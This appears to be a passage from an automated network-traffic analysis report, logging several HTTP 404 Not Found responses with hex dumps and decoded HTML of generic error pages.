be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:01:23 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:01:26 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:01:28 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:01:31 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
